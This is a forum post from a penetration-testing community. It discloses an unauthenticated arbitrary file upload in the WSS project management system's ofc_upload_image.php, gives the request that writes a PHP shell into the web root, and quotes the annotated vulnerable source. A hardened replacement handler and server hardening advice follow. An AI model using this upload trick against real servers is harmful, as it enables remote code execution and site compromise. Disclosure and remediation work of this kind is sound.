中国网络渗透测试联盟
Title: WSS project management system POST get shell
Author: admin
Time: 2013-2-23 12:38
The vulnerable file saves POSTed data as a file with any extension you choose.

Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:

/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name)

POST arbitrary data.

Saved at: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is present in the latest WSS version, even in the paid edition; this is the demo deployed in the Sina app store.
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: the file name comes straight from ?name=. basename() only strips
// directory components; it does not restrict the extension, so
// name=hfy.php produces a .php file inside the web root.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;

// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// NOTE: the raw request body is written verbatim, with no authentication
// and no check that it is actually a PNG.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();   // nothing below this line is ever executed

//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
Fix:

This vulnerable file is simply a tragedy. How to fix it: add permission checks, extension checks and the like. Sort it out yourself.
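A hardened replacement for the upload handler, added here as an example; it is not code from WSS or from Open Flash Chart. It implements the two fixes the post names (a permission check and an extension check) and adds two the post does not mention: the body must actually be a PNG, and an existing file can never be overwritten. The session key `uid`, the 2 MB limit and the upload directory are assumptions; wire the check into the application's real authentication layer.

```php
<?php
// Hardened ofc_upload_image.php (added example, not WSS/OFC code).
declare(strict_types=1);

session_start();

// 1. Authorisation. The original script is reachable by anyone.
//    ASSUMPTION: the application stores the logged-in user id in $_SESSION['uid'].
if (empty($_SESSION['uid'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Upload directory: created without world-write, outside any user-controlled path.
$default_path = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($default_path) && !mkdir($default_path, 0755, true)) {
    http_response_code(500);
    exit('cannot create upload directory');
}

// 3. Raw body. $HTTP_RAW_POST_DATA was removed in PHP 7; php://input works on every version.
//    ASSUMPTION: a chart image never needs more than 2 MB.
$body = file_get_contents('php://input');
if ($body === false || $body === '' || strlen($body) > 2 * 1024 * 1024) {
    http_response_code(400);
    exit('empty or oversized body');
}

// 4. Content check. OFC's Flash object only ever posts a PNG, so insist on one:
//    PNG signature first, then let GD parse it so a PHP payload with a fake
//    header is still rejected.
if (substr($body, 0, 8) !== "\x89PNG\r\n\x1a\n") {
    http_response_code(415);
    exit('not a png');
}
$info = @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    http_response_code(415);
    exit('png does not parse');
}

// 5. Never let the client choose the extension. Keep only safe characters from
//    the requested stem, fall back to a random name, and always append .png.
$requested = basename((string)($_GET['name'] ?? ''));
$stem = preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($requested, PATHINFO_FILENAME));
if ($stem === null || $stem === '') {
    $stem = bin2hex(random_bytes(8));
}
$destination = $default_path . $stem . '.png';

// 6. Exclusive create ('x') so a second request cannot clobber an existing image.
$fh = fopen($destination, 'x');
if ($fh === false) {
    http_response_code(409);
    exit('file already exists');
}
fwrite($fh, $body);
fclose($fh);

echo 'Saved ' . htmlspecialchars(basename($destination), ENT_QUOTES, 'UTF-8');
```

With this handler the request from the post, `?name=hfy.php` with a PHP payload in the body, fails at step 4 before any file is written, and even a genuine PNG named `hfy.php` lands as `hfy.png`. Independently of the code, serve `tmp-upload-images/` with script execution disabled (for example `php_flag engine off` in an Apache `.htaccess`, or an nginx `location` that never forwards that directory to PHP-FPM), so that a future bypass yields a file the server will not run. Note also that on PHP 7 and later the original script, with `$HTTP_RAW_POST_DATA` undefined, writes a zero-byte file and emits a notice, which is why the attack in the post works as described only on PHP 5.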
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2